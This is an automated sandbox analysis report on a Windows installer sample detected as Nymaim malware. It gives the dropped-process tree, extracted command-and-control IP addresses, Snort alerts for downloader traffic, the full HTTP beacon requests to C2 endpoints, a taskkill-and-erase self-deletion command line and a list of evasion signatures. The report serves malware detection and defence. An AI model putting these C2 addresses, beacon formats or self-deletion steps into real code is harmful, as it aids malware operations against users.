Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
file.exe

Overview

General Information

Sample Name:file.exe
Analysis ID:778228
MD5:e0f8085c7cb8eb9cf1c263bb12cfc6df
SHA1:a109ebcf251a1e69923c60330994190e40ab466c
SHA256:a28fb531e91695081ac9a3a08bd9be333462f84a3b1e9de81dda94869fd3d32a
Tags:exe
Infos:

Detection

Nymaim
Score:96
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Detected unpacking (overwrites its own PE header)
Yara detected Nymaim
Detected unpacking (changes PE section rights)
Antivirus detection for URL or domain
Multi AV Scanner detection for dropped file
Snort IDS alert for network traffic
Machine Learning detection for dropped file
C2 URLs / IPs found in malware configuration
Uses 32bit PE files
Antivirus or Machine Learning detection for unpacked file
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to query locales information (e.g. system language)
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Found evasive API chain (date check)
PE file contains sections with non-standard names
Internet Provider seen in connection with other malware
Detected potential crypto function
Contains functionality to query CPU information (cpuid)
Found potential string decryption / allocating functions
Sample execution stops while process was sleeping (likely an evasion)
Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)
Contains functionality to call native functions
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Found dropped PE file which has not been started or loaded
Contains functionality which may be used to detect a debugger (GetProcessHeap)
PE file contains executable resources (Code or Archives)
IP address seen in connection with other malware
Enables debug privileges
Creates a DirectInput object (often for capturing keystrokes)
Sample file is different than original file name gathered from version info
Drops PE files
Contains functionality to read the PEB
Found evasive API chain checking for process token information
Uses taskkill to terminate processes
Dropped file seen in connection with other malware
Found large amount of non-executed APIs
Uses Microsoft's Enhanced Cryptographic Provider
Contains functionality to detect sandboxes (foreground window change detection)
Creates a process in suspended mode (likely to inject code)

Classification

  • System is w10x64
  • file.exe (PID: 2148 cmdline: C:\Users\user\Desktop\file.exe MD5: E0F8085C7CB8EB9CF1C263BB12CFC6DF)
    • is-DTRND.tmp (PID: 6048 cmdline: "C:\Users\user\AppData\Local\Temp\is-LMEP0.tmp\is-DTRND.tmp" /SL4 $902D6 "C:\Users\user\Desktop\file.exe" 1818498 170496 MD5: E8176050192FBB976D70238E3C121F4C)
      • SplitFiles131.exe (PID: 4360 cmdline: "C:\Program Files (x86)\Split Files\SplitFiles131.exe" MD5: 361518D6CC3C25EEC2DFC1DE82B055B2)
        • KN38AzDG.exe (PID: 1960 cmdline: MD5: 3FB36CB0B7172E5298D2992D42984D06)
        • cmd.exe (PID: 1876 cmdline: "C:\Windows\System32\cmd.exe" /c taskkill /im "SplitFiles131.exe" /f & erase "C:\Program Files (x86)\Split Files\SplitFiles131.exe" & exit MD5: F3BDBE3BB6F734E357235F4D5898582D)
          • conhost.exe (PID: 5272 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
          • taskkill.exe (PID: 5224 cmdline: taskkill /im "SplitFiles131.exe" /f MD5: 15E2E0ACD891510C6268CB8899F2A1A1)
  • cleanup
{"C2 addresses": ["45.139.105.1", "85.31.46.167", "107.182.129.235", "171.22.30.106"]}
SourceRuleDescriptionAuthorStrings
00000005.00000002.371399176.0000000000400000.00000040.00000001.01000000.00000008.sdmpJoeSecurity_NymaimYara detected NymaimJoe Security
    00000005.00000002.372442187.00000000030C0000.00000004.00001000.00020000.00000000.sdmpJoeSecurity_NymaimYara detected NymaimJoe Security
      00000005.00000002.372529330.0000000003340000.00000004.00001000.00020000.00000000.sdmpJoeSecurity_NymaimYara detected NymaimJoe Security
        SourceRuleDescriptionAuthorStrings
        5.2.SplitFiles131.exe.3340000.3.unpackJoeSecurity_NymaimYara detected NymaimJoe Security
          5.2.SplitFiles131.exe.400000.0.unpackJoeSecurity_NymaimYara detected NymaimJoe Security
            5.2.SplitFiles131.exe.400000.0.raw.unpackJoeSecurity_NymaimYara detected NymaimJoe Security
              5.2.SplitFiles131.exe.3340000.3.raw.unpackJoeSecurity_NymaimYara detected NymaimJoe Security
                No Sigma rule has matched
                Timestamp:107.182.129.235192.168.2.580497062852925 01/05/23-08:47:10.017687
                SID:2852925
                Source Port:80
                Destination Port:49706
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:192.168.2.545.139.105.17149705802041920 01/05/23-08:47:09.800462
                SID:2041920
                Source Port:49705
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:192.168.2.5107.182.129.23549706802852981 01/05/23-08:47:09.990287
                SID:2852981
                Source Port:49706
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:192.168.2.5107.182.129.23549706802852980 01/05/23-08:47:09.925610
                SID:2852980
                Source Port:49706
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected

                Click to jump to signature section

                Show All Signature Results

                AV Detection

                barindex
                Source: http://171.22.30.106/library.phpURL Reputation: Label: malware
                Source: http://171.22.30.106/library.phpchAvira URL Cloud: Label: malware
                Source: http://171.22.30.106/library.phpYQAvira URL Cloud: Label: malware
                Source: http://171.22.30.106/library.php4Avira URL Cloud: Label: malware
                Source: C:\Users\user\AppData\Roaming\{e6e9dfa8-98f2-11e9-90ce-806e6f6e6963}\KN38AzDG.exeReversingLabs: Detection: 50%
                Source: C:\Program Files (x86)\Split Files\SplitFiles131.exeJoe Sandbox ML: detected
                Source: 5.2.SplitFiles131.exe.10000000.6.unpackAvira: Label: TR/Crypt.XPACK.Gen8
                Source: 1.2.file.exe.400000.0.unpackAvira: Label: TR/Crypt.XPACK.Gen2
                Source: 1.0.file.exe.400000.0.unpackAvira: Label: TR/Crypt.XPACK.Gen2
                Source: 5.2.SplitFiles131.exe.400000.0.unpackMalware Configuration Extractor: Nymaim {"C2 addresses": ["45.139.105.1", "85.31.46.167", "107.182.129.235", "171.22.30.106"]}
                Source: C:\Users\user\AppData\Local\Temp\is-LMEP0.tmp\is-DTRND.tmpCode function: 4_2_10001000 ISCryptGetVersion,4_2_10001000
                Source: C:\Users\user\AppData\Local\Temp\is-LMEP0.tmp\is-DTRND.tmpCode function: 4_2_10001130 ArcFourCrypt,4_2_10001130
                Source: C:\Program Files (x86)\Split Files\SplitFiles131.exeCode function: 5_2_00403770 CryptAcquireContextW,CryptCreateHash,_mbstowcs,CryptHashData,GetLastError,CryptDeriveKey,GetLastError,CryptReleaseContext,CryptDecrypt,CryptDestroyKey,___std_exception_copy,5_2_00403770

                Compliance

                barindex
                Source: C:\Program Files (x86)\Split Files\SplitFiles131.exeUnpacked PE file: 5.2.SplitFiles131.exe.400000.0.unpack
                Source: file.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, BYTES_REVERSED_LO, 32BIT_MACHINE, BYTES_REVERSED_HI
                Source: C:\Users\user\AppData\Local\Temp\is-LMEP0.tmp\is-DTRND.tmpCode function: 4_2_0046CA68 FindFirstFileA,FindNextFileA,FindClose,4_2_0046CA68
                Source: C:\Users\user\AppData\Local\Temp\is-LMEP0.tmp\is-DTRND.tmpCode function: 4_2_00474A14 FindFirstFileA,FindNextFileA,FindClose,FindFirstFileA,FindNextFileA,FindClose,4_2_00474A14
                Source: C:\Users\user\AppData\Local\Temp\is-LMEP0.tmp\is-DTRND.tmpCode function: 4_2_0045157C FindFirstFileA,GetLastError,4_2_0045157C
                Source: C:\Users\user\AppData\Local\Temp\is-LMEP0.tmp\is-DTRND.tmpCode function: 4_2_0045E244 SetErrorMode,FindFirstFileA,FindNextFileA,FindClose,SetErrorMode,4_2_0045E244
                Source: C:\Users\user\AppData\Local\Temp\is-LMEP0.tmp\is-DTRND.tmpCode function: 4_2_0048AC5C FindFirstFileA,6CAD69D0,FindNextFileA,FindClose,4_2_0048AC5C
                Source: C:\Users\user\AppData\Local\Temp\is-LMEP0.tmp\is-DTRND.tmpCode function: 4_2_00472CD4 FindFirstFileA,FindNextFileA,FindClose,FindFirstFileA,FindNextFileA,FindClose,4_2_00472CD4
                Source: C:\Users\user\AppData\Local\Temp\is-LMEP0.tmp\is-DTRND.tmpCode function: 4_2_0045CDA4 FindFirstFileA,FindNextFileA,FindClose,4_2_0045CDA4
                Source: C:\Users\user\AppData\Local\Temp\is-LMEP0.tmp\is-DTRND.tmpCode function: 4_2_0045DEB0 SetErrorMode,FindFirstFileA,FindNextFileA,FindClose,SetErrorMode,4_2_0045DEB0
                Source: C:\Program Files (x86)\Split Files\SplitFiles131.exeCode function: 5_2_00404490 FindFirstFileA,FindNextFileA,FindNextFileA,FindClose,__Init_thread_footer,__Init_thread_footer,__Init_thread_footer,__Init_thread_footer,5_2_00404490
                Source: C:\Program Files (x86)\Split Files\SplitFiles131.exeCode function: 5_2_00423E2D FindFirstFileExW,5_2_00423E2D
                Source: C:\Program Files (x86)\Split Files\SplitFiles131.exeCode function: 5_2_1000959D FindFirstFileExW,5_2_1000959D
                Source: C:\Users\user\AppData\Roaming\{e6e9dfa8-98f2-11e9-90ce-806e6f6e6963}\KN38AzDG.exeCode function: 6_2_00104A1A FindFirstFileExW,6_2_00104A1A
                Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Temp\is-LMEP0.tmp\is-DTRND.tmpJump to behavior
                Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Jump to behavior
                Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Jump to behavior
                Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\Jump to behavior
                Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Temp\Jump to behavior
                Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Temp\is-LMEP0.tmp\Jump to behavior

                Networking

                barindex
                Source: TrafficSnort IDS: 2041920 ET TROJAN GCleaner Downloader Activity M8 192.168.2.5:49705 -> 45.139.105.171:80
                Source: TrafficSnort IDS: 2852980 ETPRO TROJAN Win32/Fabookie.ek CnC Request M1 (GET) 192.168.2.5:49706 -> 107.182.129.235:80
                Source: TrafficSnort IDS: 2852981 ETPRO TROJAN Win32/Fabookie.ek CnC Request M3 (GET) 192.168.2.5:49706 -> 107.182.129.235:80
                Source: TrafficSnort IDS: 2852925 ETPRO TROJAN GCleaner Downloader - Payload Response 107.182.129.235:80 -> 192.168.2.5:49706
                Source: Malware configuration extractorIPs: 45.139.105.1
                Source: Malware configuration extractorIPs: 85.31.46.167
                Source: Malware configuration extractorIPs: 107.182.129.235
                Source: Malware configuration extractorIPs: 171.22.30.106
                Source: Joe Sandbox ViewASN Name: CMCSUS CMCSUS
                Source: Joe Sandbox ViewASN Name: CMCSUS CMCSUS
                Source: Joe Sandbox ViewIP Address: 45.139.105.171 45.139.105.171
                Source: unknownTCP traffic detected without corresponding DNS query: 45.139.105.171
                Source: unknownTCP traffic detected without corresponding DNS query: 45.139.105.171
                Source: unknownTCP traffic detected without corresponding DNS query: 45.139.105.171
                Source: unknownTCP traffic detected without corresponding DNS query: 45.139.105.171
                Source: unknownTCP traffic detected without corresponding DNS query: 107.182.129.235
                Source: unknownTCP traffic detected without corresponding DNS query: 107.182.129.235
                Source: unknownTCP traffic detected without corresponding DNS query: 107.182.129.235
                Source: unknownTCP traffic detected without corresponding DNS query: 107.182.129.235
                Source: unknownTCP traffic detected without corresponding DNS query: 107.182.129.235
                Source: unknownTCP traffic detected without corresponding DNS query: 107.182.129.235
                Source: unknownTCP traffic detected without corresponding DNS query: 107.182.129.235
                Source: unknownTCP traffic detected without corresponding DNS query: 107.182.129.235
                Source: unknownTCP traffic detected without corresponding DNS query: 107.182.129.235
                Source: unknownTCP traffic detected without corresponding DNS query: 107.182.129.235
                Source: unknownTCP traffic detected without corresponding DNS query: 107.182.129.235
                Source: unknownTCP traffic detected without corresponding DNS query: 107.182.129.235
                Source: unknownTCP traffic detected without corresponding DNS query: 107.182.129.235
                Source: unknownTCP traffic detected without corresponding DNS query: 107.182.129.235
                Source: unknownTCP traffic detected without corresponding DNS query: 107.182.129.235
                Source: unknownTCP traffic detected without corresponding DNS query: 107.182.129.235
                Source: unknownTCP traffic detected without corresponding DNS query: 107.182.129.235
                Source: unknownTCP traffic detected without corresponding DNS query: 107.182.129.235
                Source: unknownTCP traffic detected without corresponding DNS query: 107.182.129.235
                Source: unknownTCP traffic detected without corresponding DNS query: 107.182.129.235
                Source: unknownTCP traffic detected without corresponding DNS query: 107.182.129.235
                Source: unknownTCP traffic detected without corresponding DNS query: 107.182.129.235
                Source: unknownTCP traffic detected without corresponding DNS query: 107.182.129.235
                Source: unknownTCP traffic detected without corresponding DNS query: 107.182.129.235
                Source: unknownTCP traffic detected without corresponding DNS query: 107.182.129.235
                Source: unknownTCP traffic detected without corresponding DNS query: 107.182.129.235
                Source: unknownTCP traffic detected without corresponding DNS query: 107.182.129.235
                Source: unknownTCP traffic detected without corresponding DNS query: 107.182.129.235
                Source: unknownTCP traffic detected without corresponding DNS query: 107.182.129.235
                Source: unknownTCP traffic detected without corresponding DNS query: 107.182.129.235
                Source: unknownTCP traffic detected without corresponding DNS query: 107.182.129.235
                Source: unknownTCP traffic detected without corresponding DNS query: 107.182.129.235
                Source: unknownTCP traffic detected without corresponding DNS query: 107.182.129.235
                Source: unknownTCP traffic detected without corresponding DNS query: 107.182.129.235
                Source: unknownTCP traffic detected without corresponding DNS query: 107.182.129.235
                Source: unknownTCP traffic detected without corresponding DNS query: 107.182.129.235
                Source: unknownTCP traffic detected without corresponding DNS query: 107.182.129.235
                Source: unknownTCP traffic detected without corresponding DNS query: 107.182.129.235
                Source: unknownTCP traffic detected without corresponding DNS query: 107.182.129.235
                Source: unknownTCP traffic detected without corresponding DNS query: 107.182.129.235
                Source: unknownTCP traffic detected without corresponding DNS query: 107.182.129.235
                Source: unknownTCP traffic detected without corresponding DNS query: 107.182.129.235
                Source: unknownTCP traffic detected without corresponding DNS query: 107.182.129.235
                Source: unknownTCP traffic detected without corresponding DNS query: 107.182.129.235
                Source: unknownTCP traffic detected without corresponding DNS query: 107.182.129.235
                Source: unknownTCP traffic detected without corresponding DNS query: 107.182.129.235
                Source: SplitFiles131.exe, 00000005.00000003.360534891.00000000043C6000.00000004.00000800.00020000.00000000.sdmp, SplitFiles131.exe, 00000005.00000003.327425336.00000000043C6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://171.22.30.106/library.php
                Source: SplitFiles131.exe, 00000005.00000003.332714577.00000000043C6000.00000004.00000800.00020000.00000000.sdmp, SplitFiles131.exe, 00000005.00000003.338258725.00000000043C6000.00000004.00000800.00020000.00000000.sdmp, SplitFiles131.exe, 00000005.00000003.343762944.00000000043C6000.00000004.00000800.00020000.00000000.sdmp, SplitFiles131.exe, 00000005.00000003.327425336.00000000043C6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://171.22.30.106/library.php4
                Source: SplitFiles131.exe, 00000005.00000003.354343284.00000000043C6000.00000004.00000800.00020000.00000000.sdmp, SplitFiles131.exe, 00000005.00000003.338258725.00000000043C6000.00000004.00000800.00020000.00000000.sdmp, SplitFiles131.exe, 00000005.00000003.366040028.00000000043C6000.00000004.00000800.00020000.00000000.sdmp, SplitFiles131.exe, 00000005.00000003.343762944.00000000043C6000.00000004.00000800.00020000.00000000.sdmp, SplitFiles131.exe, 00000005.00000003.349052998.00000000043C6000.00000004.00000800.00020000.00000000.sdmp, SplitFiles131.exe, 00000005.00000003.360534891.00000000043C6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://171.22.30.106/library.phpYQ
                Source: SplitFiles131.exe, 00000005.00000003.354343284.00000000043C6000.00000004.00000800.00020000.00000000.sdmp, SplitFiles131.exe, 00000005.00000003.366040028.00000000043C6000.00000004.00000800.00020000.00000000.sdmp, SplitFiles131.exe, 00000005.00000003.343762944.00000000043C6000.00000004.00000800.00020000.00000000.sdmp, SplitFiles131.exe, 00000005.00000003.349052998.00000000043C6000.00000004.00000800.00020000.00000000.sdmp, SplitFiles131.exe, 00000005.00000003.360534891.00000000043C6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://171.22.30.106/library.phpch
                Source: is-DTRND.tmp, 00000004.00000002.373470298.000000000018F000.00000004.00000010.00020000.00000000.sdmp, is-DTRND.tmp, 00000004.00000002.374801354.0000000004D00000.00000004.00001000.00020000.00000000.sdmp, is-3OAED.tmp.4.dr, is-FBKGV.tmp.4.drString found in binary or memory: http://rus.altarsoft.com/split_files.shtml
                Source: is-DTRND.tmp, 00000004.00000002.373470298.000000000018F000.00000004.00000010.00020000.00000000.sdmp, is-DTRND.tmp, 00000004.00000002.374801354.0000000004D00000.00000004.00001000.00020000.00000000.sdmp, is-8E2LT.tmp.4.dr, is-7O3KV.tmp.4.dr, is-R2P47.tmp.4.dr, is-JMARM.tmp.4.dr, is-B20UO.tmp.4.dr, is-UJJ0L.tmp.4.dr, is-JSP8F.tmp.4.dr, is-79U67.tmp.4.dr, is-APJVT.tmp.4.dr, is-7L4JB.tmp.4.drString found in binary or memory: http://www.altarsoft.com/split_files.shtml
                Source: file.exeString found in binary or memory: http://www.innosetup.com
                Source: is-DTRND.tmp, is-DTRND.tmp, 00000004.00000002.373506640.0000000000401000.00000020.00000001.01000000.00000005.sdmp, is-AGVDF.tmp.4.dr, is-DTRND.tmp.1.drString found in binary or memory: http://www.innosetup.com/
                Source: file.exe, 00000001.00000003.289316432.00000000020FD000.00000004.00001000.00020000.00000000.sdmp, file.exe, 00000001.00000003.288963142.00000000022D9000.00000004.00001000.00020000.00000000.sdmp, is-DTRND.tmp, 00000004.00000002.373626287.00000000004C4000.00000002.00000001.01000000.00000005.sdmp, is-AGVDF.tmp.4.dr, is-DTRND.tmp.1.drString found in binary or memory: http://www.innosetup.comDVarFileInfo$
                Source: file.exe, 00000001.00000003.289027881.0000000002058000.00000004.00001000.00020000.00000000.sdmp, file.exe, 00000001.00000003.288799915.0000000002230000.00000004.00001000.00020000.00000000.sdmp, is-DTRND.tmp, is-DTRND.tmp, 00000004.00000002.373506640.0000000000401000.00000020.00000001.01000000.00000005.sdmp, is-AGVDF.tmp.4.dr, is-DTRND.tmp.1.drString found in binary or memory: http://www.remobjects.com/?ps
                Source: file.exe, 00000001.00000003.289027881.0000000002058000.00000004.00001000.00020000.00000000.sdmp, file.exe, 00000001.00000003.288799915.0000000002230000.00000004.00001000.00020000.00000000.sdmp, is-DTRND.tmp, 00000004.00000002.373506640.0000000000401000.00000020.00000001.01000000.00000005.sdmp, is-AGVDF.tmp.4.dr, is-DTRND.tmp.1.drString found in binary or memory: http://www.remobjects.com/?psU
                Source: C:\Program Files (x86)\Split Files\SplitFiles131.exeCode function: 5_2_00401B30 HttpAddRequestHeadersA,InternetSetFilePointer,InternetReadFile,HttpQueryInfoA,CoCreateInstance,MultiByteToWideChar,MultiByteToWideChar,MultiByteToWideChar,MultiByteToWideChar,MultiByteToWideChar,5_2_00401B30
                Source: global trafficHTTP traffic detected: GET /itsnotmalware/count.php?sub=NOSUB&stream=mixtwo&substream=mixinte HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0User-Agent: 1Host: 45.139.105.171Connection: Keep-AliveCache-Control: no-cache
                Source: global trafficHTTP traffic detected: GET /storage/ping.php HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0User-Agent: 0Host: 107.182.129.235Connection: Keep-AliveCache-Control: no-cache
                Source: global trafficHTTP traffic detected: GET /storage/extension.php HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0User-Agent: 1Host: 107.182.129.235Connection: Keep-AliveCache-Control: no-cache
                Source: global trafficHTTP traffic detected: GET /library.php HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0User-Agent: 2Host: 171.22.30.106Connection: Keep-AliveCache-Control: no-cache
                Source: global trafficHTTP traffic detected: GET /library.php HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0User-Agent: 2Host: 171.22.30.106Connection: Keep-AliveCache-Control: no-cache
                Source: global trafficHTTP traffic detected: GET /library.php HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0User-Agent: 2Host: 171.22.30.106Connection: Keep-AliveCache-Control: no-cache
                Source: global trafficHTTP traffic detected: GET /library.php HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0User-Agent: 2Host: 171.22.30.106Connection: Keep-AliveCache-Control: no-cache
                Source: global trafficHTTP traffic detected: GET /library.php HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0User-Agent: 2Host: 171.22.30.106Connection: Keep-AliveCache-Control: no-cache
                Source: global trafficHTTP traffic detected: GET /library.php HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0User-Agent: 2Host: 171.22.30.106Connection: Keep-AliveCache-Control: no-cache
                Source: global trafficHTTP traffic detected: GET /library.php HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0User-Agent: 2Host: 171.22.30.106Connection: Keep-AliveCache-Control: no-cache
                Source: global trafficHTTP traffic detected: GET /library.php HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0User-Agent: 2Host: 171.22.30.106Connection: Keep-AliveCache-Control: no-cache
                Source: global trafficHTTP traffic detected: GET /library.php HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0User-Agent: 2Host: 171.22.30.106Connection: Keep-AliveCache-Control: no-cache
                Source: global trafficHTTP traffic detected: GET /library.php HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0User-Agent: 2Host: 171.22.30.106Connection: Keep-AliveCache-Control: no-cache
                Source: global trafficHTTP traffic detected: GET /library.php HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0User-Agent: 2Host: 171.22.30.106Connection: Keep-AliveCache-Control: no-cache
                Source: file.exe, 00000001.00000002.376583060.00000000007AA000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: <HOOK MODULE="DDRAW.DLL" FUNCTION="DirectDrawCreateEx"/>

                E-Banking Fraud

                barindex
                Source: Yara matchFile source: 5.2.SplitFiles131.exe.3340000.3.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 5.2.SplitFiles131.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 5.2.SplitFiles131.exe.400000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 5.2.SplitFiles131.exe.3340000.3.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000005.00000002.371399176.0000000000400000.00000040.00000001.01000000.00000008.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000005.00000002.372442187.00000000030C0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000005.00000002.372529330.0000000003340000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                Source: file.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, BYTES_REVERSED_LO, 32BIT_MACHINE, BYTES_REVERSED_HI
                Source: C:\Users\user\Desktop\file.exeCode function: 1_2_004082801_2_00408280
                Source: C:\Users\user\AppData\Local\Temp\is-LMEP0.tmp\is-DTRND.tmpCode function: 4_2_00468C284_2_00468C28
                Source: C:\Users\user\AppData\Local\Temp\is-LMEP0.tmp\is-DTRND.tmpCode function: 4_2_004612804_2_00461280
                Source: C:\Users\user\AppData\Local\Temp\is-LMEP0.tmp\is-DTRND.tmpCode function: 4_2_0043DE404_2_0043DE40
                Source: C:\Users\user\AppData\Local\Temp\is-LMEP0.tmp\is-DTRND.tmpCode function: 4_2_004302D04_2_004302D0
                Source: C:\Users\user\AppData\Local\Temp\is-LMEP0.tmp\is-DTRND.tmpCode function: 4_2_004445B84_2_004445B8
                Source: C:\Users\user\AppData\Local\Temp\is-LMEP0.tmp\is-DTRND.tmpCode function: 4_2_004348644_2_00434864
                Source: C:\Users\user\AppData\Local\Temp\is-LMEP0.tmp\is-DTRND.tmpCode function: 4_2_0047AA904_2_0047AA90
                Source: C:\Users\user\AppData\Local\Temp\is-LMEP0.tmp\is-DTRND.tmpCode function: 4_2_00444B604_2_00444B60
                Source: C:\Users\user\AppData\Local\Temp\is-LMEP0.tmp\is-DTRND.tmpCode function: 4_2_0045ADE04_2_0045ADE0
                Source: C:\Users\user\AppData\Local\Temp\is-LMEP0.tmp\is-DTRND.tmpCode function: 4_2_00480F944_2_00480F94
                Source: C:\Users\user\AppData\Local\Temp\is-LMEP0.tmp\is-DTRND.tmpCode function: 4_2_004452584_2_00445258
                Source: C:\Users\user\AppData\Local\Temp\is-LMEP0.tmp\is-DTRND.tmpCode function: 4_2_004132E14_2_004132E1
                Source: C:\Users\user\AppData\Local\Temp\is-LMEP0.tmp\is-DTRND.tmpCode function: 4_2_004632884_2_00463288
                Source: C:\Users\user\AppData\Local\Temp\is-LMEP0.tmp\is-DTRND.tmpCode function: 4_2_004355684_2_00435568
                Source: C:\Users\user\AppData\Local\Temp\is-LMEP0.tmp\is-DTRND.tmpCode function: 4_2_004456644_2_00445664
                Source: C:\Users\user\AppData\Local\Temp\is-LMEP0.tmp\is-DTRND.tmpCode function: 4_2_0042F8744_2_0042F874
                Source: C:\Users\user\AppData\Local\Temp\is-LMEP0.tmp\is-DTRND.tmpCode function: 4_2_00457F044_2_00457F04
                Source: C:\Program Files (x86)\Split Files\SplitFiles131.exeCode function: 5_2_004044905_2_00404490
                Source: C:\Program Files (x86)\Split Files\SplitFiles131.exeCode function: 5_2_004096F05_2_004096F0
                Source: C:\Program Files (x86)\Split Files\SplitFiles131.exeCode function: 5_2_004056A05_2_004056A0
                Source: C:\Program Files (x86)\Split Files\SplitFiles131.exeCode function: 5_2_004068005_2_00406800
                Source: C:\Program Files (x86)\Split Files\SplitFiles131.exeCode function: 5_2_00406AA05_2_00406AA0
                Source: C:\Program Files (x86)\Split Files\SplitFiles131.exeCode function: 5_2_00404D405_2_00404D40
                Source: C:\Program Files (x86)\Split Files\SplitFiles131.exeCode function: 5_2_00405F405_2_00405F40
